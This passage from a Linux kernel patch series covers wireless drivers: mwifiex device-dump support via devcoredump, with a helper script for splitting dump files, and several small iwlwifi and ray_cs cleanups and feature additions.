work_struct *work) { - if (test_and_clear_bit(MWIFIEX_IFACE_WORK_FW_DUMP, + if (test_and_clear_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) - mwifiex_sdio_fw_dump_work(save_adapter); + mwifiex_sdio_device_dump_work(save_adapter); if (test_and_clear_bit(MWIFIEX_IFACE_WORK_CARD_RESET, &iface_work_flags)) mwifiex_sdio_card_reset_work(save_adapter); @@ -2330,13 +2334,13 @@ static void mwifiex_sdio_card_reset(struct mwifiex_adapter *adapter) } /* This function dumps FW information */ -static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) +static void mwifiex_sdio_device_dump(struct mwifiex_adapter *adapter) { save_adapter = adapter; - if (test_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags)) + if (test_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags)) return; - set_bit(MWIFIEX_IFACE_WORK_FW_DUMP, &iface_work_flags); + set_bit(MWIFIEX_IFACE_WORK_DEVICE_DUMP, &iface_work_flags); schedule_work(&sdio_work); } @@ -2453,8 +2457,8 @@ static struct mwifiex_if_ops sdio_ops = { .cmdrsp_complete = mwifiex_sdio_cmdrsp_complete, .event_complete = mwifiex_sdio_event_complete, .card_reset = mwifiex_sdio_card_reset, - .fw_dump = mwifiex_sdio_fw_dump, .reg_dump = mwifiex_sdio_reg_dump, + .device_dump = mwifiex_sdio_device_dump, .deaggr_pkt = mwifiex_deaggr_sdio_pkt, }; From 57670ee882d4d879eb1b8e18e72173507c2a4c65 Mon Sep 17 00:00:00 2001 From: Amitkumar Karwar Date: Tue, 26 May 2015 06:34:32 -0700 Subject: [PATCH 620/872] mwifiex: device dump support via devcoredump framework Currently device dump generated in the driver is retrieved using ethtool set/get dump commands. We will get rid of ethtool approach and use devcoredump framework. Device dump can be trigger by cat /debugfs/mwifiex/mlanX/device_dump and when the dump operation is completed, data can be read by cat /sys/class/devcoredump/devcdX/data We have prepared following script to split device dump data into multiple files. [root]# cat mwifiex_split_dump_data.sh #!/bin/bash # usage: ./mwifiex_split_dump_data.sh dump_data fw_dump_data=$1 mem_type="driverinfo ITCM DTCM SQRAM APU CIU ICU MAC" for name in ${mem_type[@]} do sed -n "/Start dump $name/,/End dump/p" $fw_dump_data > tmp.$name.log if [ ! 
-s tmp.$name.log ] then rm -rf tmp.$name.log else #Remove the describle info "Start dump" and "End dump" sed '1d' tmp.$name.log | sed '$d' > /data/$name.log if [ -s /data/$name.log ] then echo "generate /data/$name.log" else sed '1d' tmp.$name.log | sed '$d' > /var/$name.log echo "generate /var/$name.log" fi rm -rf tmp.$name.log fi done Signed-off-by: Amitkumar Karwar Signed-off-by: Cathy Luo Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/Kconfig | 2 + drivers/net/wireless/mwifiex/ethtool.c | 99 -------------------------- drivers/net/wireless/mwifiex/main.c | 90 +++++++++++++++++++++++ drivers/net/wireless/mwifiex/main.h | 3 +- drivers/net/wireless/mwifiex/pcie.c | 21 +++--- drivers/net/wireless/mwifiex/sdio.c | 5 +- 6 files changed, 103 insertions(+), 117 deletions(-) diff --git a/drivers/net/wireless/mwifiex/Kconfig b/drivers/net/wireless/mwifiex/Kconfig index aa01c9bc77f9..48edf387683e 100644 --- a/drivers/net/wireless/mwifiex/Kconfig +++ b/drivers/net/wireless/mwifiex/Kconfig @@ -12,6 +12,7 @@ config MWIFIEX_SDIO tristate "Marvell WiFi-Ex Driver for SD8786/SD8787/SD8797/SD8887/SD8897" depends on MWIFIEX && MMC select FW_LOADER + select WANT_DEV_COREDUMP ---help--- This adds support for wireless adapters based on Marvell 8786/8787/8797/8887/8897 chipsets with SDIO interface. @@ -23,6 +24,7 @@ config MWIFIEX_PCIE tristate "Marvell WiFi-Ex Driver for PCIE 8766/8897" depends on MWIFIEX && PCI select FW_LOADER + select WANT_DEV_COREDUMP ---help--- This adds support for wireless adapters based on Marvell 8766/8897 chipsets with PCIe interface. diff --git a/drivers/net/wireless/mwifiex/ethtool.c b/drivers/net/wireless/mwifiex/ethtool.c index c78bf0a340fb..58400c69ab26 100644 --- a/drivers/net/wireless/mwifiex/ethtool.c +++ b/drivers/net/wireless/mwifiex/ethtool.c @@ -64,106 +64,7 @@ static int mwifiex_ethtool_set_wol(struct net_device *dev, return 0; } -static int -mwifiex_get_dump_flag(struct net_device *dev, struct ethtool_dump *dump) -{ - struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - struct mwifiex_adapter *adapter = priv->adapter; - struct memory_type_mapping *entry; - - if (!adapter->if_ops.device_dump) - return -ENOTSUPP; - - dump->flag = adapter->curr_mem_idx; - dump->version = 1; - if (adapter->curr_mem_idx == MWIFIEX_DRV_INFO_IDX) { - dump->len = adapter->drv_info_size; - } else if (adapter->curr_mem_idx != MWIFIEX_FW_DUMP_IDX) { - entry = &adapter->mem_type_mapping_tbl[adapter->curr_mem_idx]; - dump->len = entry->mem_size; - } else { - dump->len = 0; - } - - return 0; -} - -static int -mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, - void *buffer) -{ - u8 *p = buffer; - struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - struct mwifiex_adapter *adapter = priv->adapter; - struct memory_type_mapping *entry; - - if (!adapter->if_ops.device_dump) - return -ENOTSUPP; - - if (adapter->curr_mem_idx == MWIFIEX_DRV_INFO_IDX) { - if (!adapter->drv_info_dump) - return -EFAULT; - memcpy(p, adapter->drv_info_dump, adapter->drv_info_size); - return 0; - } - - if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - mwifiex_dbg(adapter, ERROR, - "device dump in progress!!\n"); - return -EBUSY; - } - - entry = &adapter->mem_type_mapping_tbl[adapter->curr_mem_idx]; - - if (!entry->mem_ptr) - return -EFAULT; - - memcpy(p, entry->mem_ptr, entry->mem_size); - - entry->mem_size = 0; - vfree(entry->mem_ptr); - entry->mem_ptr = NULL; - - return 0; -} - -static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) -{ - struct 
mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - struct mwifiex_adapter *adapter = priv->adapter; - - if (!adapter->if_ops.device_dump) - return -ENOTSUPP; - - if (val->flag == MWIFIEX_DRV_INFO_IDX) { - adapter->curr_mem_idx = MWIFIEX_DRV_INFO_IDX; - return 0; - } - - if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - mwifiex_dbg(adapter, ERROR, - "device dump in progress!!\n"); - return -EBUSY; - } - - if (val->flag == MWIFIEX_FW_DUMP_IDX) { - adapter->curr_mem_idx = val->flag; - adapter->if_ops.device_dump(adapter); - return 0; - } - - if (val->flag < 0 || val->flag >= adapter->num_mem_types) - return -EINVAL; - - adapter->curr_mem_idx = val->flag; - - return 0; -} - const struct ethtool_ops mwifiex_ethtool_ops = { .get_wol = mwifiex_ethtool_get_wol, .set_wol = mwifiex_ethtool_set_wol, - .get_dump_flag = mwifiex_get_dump_flag, - .get_dump_data = mwifiex_get_dump_data, - .set_dump = mwifiex_set_dump, }; diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index b7fbc2cdf0bd..3ba4e0e04223 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -982,6 +982,96 @@ void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter) } EXPORT_SYMBOL_GPL(mwifiex_drv_info_dump); +void mwifiex_upload_device_dump(struct mwifiex_adapter *adapter) +{ + u8 idx, *dump_data, *fw_dump_ptr; + u32 dump_len; + + dump_len = (strlen("========Start dump driverinfo========\n") + + adapter->drv_info_size + + strlen("\n========End dump========\n")); + + for (idx = 0; idx < adapter->num_mem_types; idx++) { + struct memory_type_mapping *entry = + &adapter->mem_type_mapping_tbl[idx]; + + if (entry->mem_ptr) { + dump_len += (strlen("========Start dump ") + + strlen(entry->mem_name) + + strlen("========\n") + + (entry->mem_size + 1) + + strlen("\n========End dump========\n")); + } + } + + dump_data = vzalloc(dump_len + 1); + if (!dump_data) + goto done; + + fw_dump_ptr = dump_data; + + /* Dump all the memory data into single file, a userspace script will + * be used to split all the memory data to multiple files + */ + mwifiex_dbg(adapter, MSG, + "== mwifiex dump information to /sys/class/devcoredump start"); + + strcpy(fw_dump_ptr, "========Start dump driverinfo========\n"); + fw_dump_ptr += strlen("========Start dump driverinfo========\n"); + memcpy(fw_dump_ptr, adapter->drv_info_dump, adapter->drv_info_size); + fw_dump_ptr += adapter->drv_info_size; + strcpy(fw_dump_ptr, "\n========End dump========\n"); + fw_dump_ptr += strlen("\n========End dump========\n"); + + for (idx = 0; idx < adapter->num_mem_types; idx++) { + struct memory_type_mapping *entry = + &adapter->mem_type_mapping_tbl[idx]; + + if (entry->mem_ptr) { + strcpy(fw_dump_ptr, "========Start dump "); + fw_dump_ptr += strlen("========Start dump "); + + strcpy(fw_dump_ptr, entry->mem_name); + fw_dump_ptr += strlen(entry->mem_name); + + strcpy(fw_dump_ptr, "========\n"); + fw_dump_ptr += strlen("========\n"); + + memcpy(fw_dump_ptr, entry->mem_ptr, entry->mem_size); + fw_dump_ptr += entry->mem_size; + + strcpy(fw_dump_ptr, "\n========End dump========\n"); + fw_dump_ptr += strlen("\n========End dump========\n"); + } + } + + /* device dump data will be free in device coredump release function + * after 5 min + */ + dev_coredumpv(adapter->dev, dump_data, dump_len, GFP_KERNEL); + mwifiex_dbg(adapter, MSG, + "== mwifiex dump information to /sys/class/devcoredump end"); + +done: + for (idx = 0; idx < adapter->num_mem_types; idx++) { + struct memory_type_mapping *entry = + 
&adapter->mem_type_mapping_tbl[idx]; + + if (entry->mem_ptr) { + vfree(entry->mem_ptr); + entry->mem_ptr = NULL; + } + entry->mem_size = 0; + } + + if (adapter->drv_info_dump) { + vfree(adapter->drv_info_dump); + adapter->drv_info_dump = NULL; + adapter->drv_info_size = 0; + } +} +EXPORT_SYMBOL_GPL(mwifiex_upload_device_dump); + /* * CFG802.11 network device handler for statistics retrieval. */ diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index 01111fe72a43..5a6c1c76b33b 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -36,6 +36,7 @@ #include #include #include +#include #include "decl.h" #include "ioctl.h" @@ -950,7 +951,6 @@ struct mwifiex_adapter { u8 key_api_major_ver, key_api_minor_ver; struct memory_type_mapping *mem_type_mapping_tbl; u8 num_mem_types; - u8 curr_mem_idx; void *drv_info_dump; u32 drv_info_size; bool scan_chan_gap_enabled; @@ -1485,6 +1485,7 @@ u8 mwifiex_adjust_data_rate(struct mwifiex_private *priv, u8 rx_rate, u8 ht_info); void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter); +void mwifiex_upload_device_dump(struct mwifiex_adapter *adapter); void *mwifiex_alloc_dma_align_buf(int rx_len, gfp_t flags); void mwifiex_queue_main_work(struct mwifiex_adapter *adapter); diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 3a9936843c21..77b9055a2d14 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -2314,7 +2314,6 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) enum rdwr_status stat; u32 memory_size; int ret; - static char *env[] = { "DRIVER=mwifiex_pcie", "EVENT=fw_dump", NULL }; if (!card->pcie.can_dump_fw) return; @@ -2334,7 +2333,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) /* Read the number of the memories which will dump */ stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); if (stat == RDWR_STATUS_FAILURE) - goto done; + return; reg = creg->fw_dump_start; mwifiex_read_reg_byte(adapter, reg, &dump_num); @@ -2345,7 +2344,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); if (stat == RDWR_STATUS_FAILURE) - goto done; + return; memory_size = 0; reg = creg->fw_dump_start; @@ -2361,7 +2360,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) FW_DUMP_READ_DONE); if (ret) { mwifiex_dbg(adapter, ERROR, "PCIE write err\n"); - goto done; + return; } break; } @@ -2373,7 +2372,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) if (!entry->mem_ptr) { mwifiex_dbg(adapter, ERROR, "Vmalloc %s failed\n", entry->mem_name); - goto done; + return; } dbg_ptr = entry->mem_ptr; end_ptr = dbg_ptr + memory_size; @@ -2385,7 +2384,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) do { stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); if (RDWR_STATUS_FAILURE == stat) - goto done; + return; reg_start = creg->fw_dump_start; reg_end = creg->fw_dump_end; @@ -2396,7 +2395,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) } else { mwifiex_dbg(adapter, ERROR, "Allocated buf not enough\n"); - goto done; + return; } } @@ -2409,18 +2408,14 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) break; } while (true); } - mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); - - kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); - -done: - adapter->curr_mem_idx = 0; + mwifiex_dbg(adapter, 
DUMP, "== mwifiex firmware dump end ==\n"); } static void mwifiex_pcie_device_dump_work(struct mwifiex_adapter *adapter) { mwifiex_drv_info_dump(adapter); mwifiex_pcie_fw_dump(adapter); + mwifiex_upload_device_dump(adapter); } static unsigned long iface_work_flags; diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index 1f32c0214c82..a0b121f3460c 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2185,7 +2185,6 @@ static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) u8 *dbg_ptr, *end_ptr, dump_num, idx, i, read_reg, doneflag = 0; enum rdwr_status stat; u32 memory_size; - static char *env[] = { "DRIVER=mwifiex_sdio", "EVENT=fw_dump", NULL }; if (!card->can_dump_fw) return; @@ -2297,17 +2296,15 @@ static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) } mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); - kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); - done: sdio_release_host(card->func); - adapter->curr_mem_idx = 0; } static void mwifiex_sdio_device_dump_work(struct mwifiex_adapter *adapter) { mwifiex_drv_info_dump(adapter); mwifiex_sdio_fw_dump(adapter); + mwifiex_upload_device_dump(adapter); } static void mwifiex_sdio_work(struct work_struct *work) From fa2ab6971844141add8d98a73a0a9679f9067bb5 Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Wed, 27 May 2015 06:25:57 +0530 Subject: [PATCH 621/872] ray_cs: Change 1 to true for bool type variable. The variable translate is bool type. So assigning true instead of 1. Signed-off-by: Shailendra Verma Signed-off-by: Kalle Valo --- drivers/net/wireless/ray_cs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/ray_cs.c b/drivers/net/wireless/ray_cs.c index 477f86354dc5..0881ba8535f4 100644 --- a/drivers/net/wireless/ray_cs.c +++ b/drivers/net/wireless/ray_cs.c @@ -143,7 +143,7 @@ static int psm; static char *essid; /* Default to encapsulation unless translation requested */ -static bool translate = 1; +static bool translate = true; static int country = USA; From bb8f44c919309eb638e26e6d5e6b5d1fae8d6748 Mon Sep 17 00:00:00 2001 From: Eyal Shapira Date: Wed, 27 May 2015 22:00:03 +0300 Subject: [PATCH 622/872] iwlwifi: mvm: rs: pass rate directly to column checks A minor refactoring for following patches. This enables the reuse of the checks functions. 
type=cleanup Signed-off-by: Eyal Shapira Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/rs.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/rs.c b/drivers/net/wireless/iwlwifi/mvm/rs.c index 1295178abfae..ae9965647771 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rs.c +++ b/drivers/net/wireless/iwlwifi/mvm/rs.c @@ -138,7 +138,7 @@ struct rs_tx_column; typedef bool (*allow_column_func_t) (struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col); struct rs_tx_column { @@ -150,14 +150,14 @@ struct rs_tx_column { }; static bool rs_ant_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { return iwl_mvm_bt_coex_is_ant_avail(mvm, next_col->ant); } static bool rs_mimo_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { struct iwl_mvm_sta *mvmsta; @@ -187,7 +187,7 @@ static bool rs_mimo_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, } static bool rs_siso_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { if (!sta->ht_cap.ht_supported) @@ -197,10 +197,9 @@ static bool rs_siso_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, } static bool rs_sgi_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { - struct rs_rate *rate = &tbl->rate; struct ieee80211_sta_ht_cap *ht_cap = &sta->ht_cap; struct ieee80211_sta_vht_cap *vht_cap = &sta->vht_cap; @@ -1659,7 +1658,8 @@ static enum rs_column rs_get_next_column(struct iwl_mvm *mvm, for (j = 0; j < MAX_COLUMN_CHECKS; j++) { allow_func = next_col->checks[j]; - if (allow_func && !allow_func(mvm, sta, tbl, next_col)) + if (allow_func && !allow_func(mvm, sta, &tbl->rate, + next_col)) break; } From 6a8ac59c80d74df0a6e2280ebec77b307d8c077a Mon Sep 17 00:00:00 2001 From: Liad Kaufman Date: Tue, 19 May 2015 13:47:03 +0300 Subject: [PATCH 623/872] iwlwifi: wrt: add mipi type to debug types This adds the MIPI mode type to the types declared supported by the driver. Without this patch, when using MIPI mode and looking at the logs the user would see the debug destination "UNKNOWN". 
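To illustrate the point of the change: the debug-destination name is derived from the monitor-mode enum with a default of "UNKNOWN", so a mode missing from the switch prints as unknown even though the hardware supports it. A simplified sketch of that mapping, trimmed to the relevant cases (not the exact driver function):

enum dbg_monitor_mode { SMEM_MODE, EXTERNAL_MODE, MARBH_MODE, MIPI_MODE };

static const char *dbg_mode_name(enum dbg_monitor_mode mode)
{
	switch (mode) {
	case EXTERNAL_MODE:	return "EXTERNAL_DRAM";
	case MARBH_MODE:	return "MARBH";
	case MIPI_MODE:		return "MIPI";	/* the case this patch adds */
	default:		return "UNKNOWN"; /* what MIPI users saw before */
	}
}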
Signed-off-by: Liad Kaufman Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 2 ++ drivers/net/wireless/iwlwifi/iwl-fw.h | 4 +++- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index a8d0b6423f7c..5b7c0ae52f93 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -427,11 +427,13 @@ struct iwl_fw_dbg_reg_op { * @SMEM_MODE: monitor stores the data in SMEM * @EXTERNAL_MODE: monitor stores the data in allocated DRAM * @MARBH_MODE: monitor stores the data in MARBH buffer + * @MIPI_MODE: monitor outputs the data through the MIPI interface */ enum iwl_fw_dbg_monitor_mode { SMEM_MODE = 0, EXTERNAL_MODE = 1, MARBH_MODE = 2, + MIPI_MODE = 3, }; /** diff --git a/drivers/net/wireless/iwlwifi/iwl-fw.h b/drivers/net/wireless/iwlwifi/iwl-fw.h index cf75bafae51d..cdc7f1edaed9 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw.h @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -205,6 +205,8 @@ static inline const char *get_fw_dbg_mode_string(int mode) return "EXTERNAL_DRAM"; case MARBH_MODE: return "MARBH"; + case MIPI_MODE: + return "MIPI"; default: return "UNKNOWN"; } From 95411d0455cc522c9f5176d37940a311e0241c42 Mon Sep 17 00:00:00 2001 From: Avri Altman Date: Mon, 11 May 2015 11:04:34 +0300 Subject: [PATCH 624/872] iwlwifi: pcie: Control access to the NIC's PM registers via iwl_cfg Allow a cleaner way to access those hw-dependent registers, instead of using the product family type etc. 
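The design choice here is to gate access to the APMG power-management registers on a per-device capability flag carried in the configuration struct, instead of comparing against the hardware family enum at every call site. A minimal sketch of the pattern, with invented names (chip_cfg, transport) standing in for the real structures:

#include <linux/types.h>

struct chip_cfg {
	bool apmg_not_supported;	/* true on families without APMG */
};

struct transport {
	const struct chip_cfg *cfg;
};

static void apmg_power_down_clocks(struct transport *trans)
{
	if (trans->cfg->apmg_not_supported)
		return;			/* register block absent: nothing to do */

	/* ... APMG register writes would go here ... */
}

New families then only need to set the flag in their config definition; no call sites change.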
Signed-off-by: Avri Altman Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-8000.c | 3 ++- drivers/net/wireless/iwlwifi/iwl-config.h | 1 + drivers/net/wireless/iwlwifi/mvm/ops.c | 2 +- drivers/net/wireless/iwlwifi/pcie/rx.c | 1 + drivers/net/wireless/iwlwifi/pcie/trans.c | 16 ++++++++-------- 5 files changed, 13 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index 5dca838a3e8b..5c08f7035b4f 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -163,7 +163,8 @@ static const struct iwl_tt_params iwl8000_tt_params = { .smem_len = IWL8260_SMEM_LEN, \ .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, \ .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, \ - .thermal_params = &iwl8000_tt_params + .thermal_params = &iwl8000_tt_params, \ + .apmg_not_supported = true const struct iwl_cfg iwl8260_2n_cfg = { .name = "Intel(R) Dual Band Wireless N 8260", diff --git a/drivers/net/wireless/iwlwifi/iwl-config.h b/drivers/net/wireless/iwlwifi/iwl-config.h index 225b6d6b8573..08c14afeb148 100644 --- a/drivers/net/wireless/iwlwifi/iwl-config.h +++ b/drivers/net/wireless/iwlwifi/iwl-config.h @@ -360,6 +360,7 @@ struct iwl_cfg { const u32 smem_offset; const u32 smem_len; const struct iwl_tt_params *thermal_params; + bool apmg_not_supported; }; /* diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 690b33677510..91ca626704e3 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -194,7 +194,7 @@ static void iwl_mvm_nic_config(struct iwl_op_mode *op_mode) * (PCIe power is lost before PERST# is asserted), causing ME FW * to lose ownership and not being able to obtain it back. */ - if (mvm->trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) + if (!mvm->trans->cfg->apmg_not_supported) iwl_set_bits_mask_prph(mvm->trans, APMG_PS_CTRL_REG, APMG_PS_CTRL_EARLY_PWR_OFF_RESET_DIS, ~APMG_PS_CTRL_EARLY_PWR_OFF_RESET_DIS); diff --git a/drivers/net/wireless/iwlwifi/pcie/rx.c b/drivers/net/wireless/iwlwifi/pcie/rx.c index 7ff69c642103..adad8d0fae7f 100644 --- a/drivers/net/wireless/iwlwifi/pcie/rx.c +++ b/drivers/net/wireless/iwlwifi/pcie/rx.c @@ -775,6 +775,7 @@ static void iwl_pcie_irq_handle_error(struct iwl_trans *trans) /* W/A for WiFi/WiMAX coex and WiMAX own the RF */ if (trans->cfg->internal_wimax_coex && + !trans->cfg->apmg_not_supported && (!(iwl_read_prph(trans, APMG_CLK_CTRL_REG) & APMS_CLK_VAL_MRB_FUNC_MODE) || (iwl_read_prph(trans, APMG_PS_CTRL_REG) & diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index a341ed90f8a8..dd1b90b04763 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -182,6 +182,9 @@ static void iwl_trans_pcie_write_shr(struct iwl_trans *trans, u32 reg, u32 val) static void iwl_pcie_set_pwr(struct iwl_trans *trans, bool vaux) { + if (!trans->cfg->apmg_not_supported) + return; + if (vaux && pci_pme_capable(to_pci_dev(trans->dev), PCI_D3cold)) iwl_set_bits_mask_prph(trans, APMG_PS_CTRL_REG, APMG_PS_CTRL_VAL_PWR_SRC_VAUX, @@ -315,7 +318,7 @@ static int iwl_pcie_apm_init(struct iwl_trans *trans) * bits do not disable clocks. This preserves any hardware * bits already set by default in "CLK_CTRL_REG" after reset. 
*/ - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) { + if (!trans->cfg->apmg_not_supported) { iwl_write_prph(trans, APMG_CLK_EN_REG, APMG_CLK_VAL_DMA_CLK_RQT); udelay(20); @@ -515,8 +518,7 @@ static int iwl_pcie_nic_init(struct iwl_trans *trans) spin_unlock(&trans_pcie->irq_lock); - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) - iwl_pcie_set_pwr(trans, false); + iwl_pcie_set_pwr(trans, false); iwl_op_mode_nic_config(trans->op_mode); @@ -1063,7 +1065,7 @@ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans, bool low_power) iwl_pcie_rx_stop(trans); /* Power-down device's busmaster DMA clocks */ - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) { + if (!trans->cfg->apmg_not_supported) { iwl_write_prph(trans, APMG_CLK_DIS_REG, APMG_CLK_VAL_DMA_CLK_RQT); udelay(5); @@ -1160,8 +1162,7 @@ static void iwl_trans_pcie_d3_suspend(struct iwl_trans *trans, bool test) */ iwl_trans_pcie_tx_reset(trans); - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) - iwl_pcie_set_pwr(trans, true); + iwl_pcie_set_pwr(trans, true); } static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, @@ -1199,8 +1200,7 @@ static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, return ret; } - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) - iwl_pcie_set_pwr(trans, false); + iwl_pcie_set_pwr(trans, false); iwl_trans_pcie_tx_reset(trans); From f0bf859304a9444e275530a29d4162978c9e8b81 Mon Sep 17 00:00:00 2001 From: David Spinadel Date: Wed, 20 May 2015 11:56:59 +0300 Subject: [PATCH 625/872] iwlwifi: mvm: add inactive state to ebs status Currently EBS status in scan complete notifications is set to success if EBS wasn't activated. FW will add a special return value for cases when EBS wasn't activated and we add a print of this status. This change is needed for debug only, no behavior changes. 
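The behavioural point is that an "inactive" EBS result should neither be logged as a failure nor disable EBS for the next scan. A hedged sketch of that handling with simplified enum names (the driver's real constants are the IWL_SCAN_EBS_* values shown in the diff below):

enum ebs_status { EBS_SUCCESS, EBS_FAILED, EBS_CHAN_NOT_FOUND, EBS_INACTIVE };

static const char *ebs_status_str(enum ebs_status status)
{
	switch (status) {
	case EBS_SUCCESS:	return "successful";
	case EBS_INACTIVE:	return "inactive";	/* EBS never ran */
	default:		return "failed";
	}
}

/* Only a genuine failure should clear the "last EBS successful" state. */
static bool ebs_still_usable(enum ebs_status status)
{
	return status == EBS_SUCCESS || status == EBS_INACTIVE;
}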
Signed-off-by: David Spinadel Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/mvm/fw-api-scan.h | 1 + drivers/net/wireless/iwlwifi/mvm/scan.c | 33 ++++++++++++++----- 2 files changed, 25 insertions(+), 9 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h index f34cf002e243..5e4cbdb44c60 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h @@ -294,6 +294,7 @@ enum iwl_scan_ebs_status { IWL_SCAN_EBS_SUCCESS, IWL_SCAN_EBS_FAILED, IWL_SCAN_EBS_CHAN_NOT_FOUND, + IWL_SCAN_EBS_INACTIVE, }; /** diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 4f4570d5261d..9409237435b6 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ 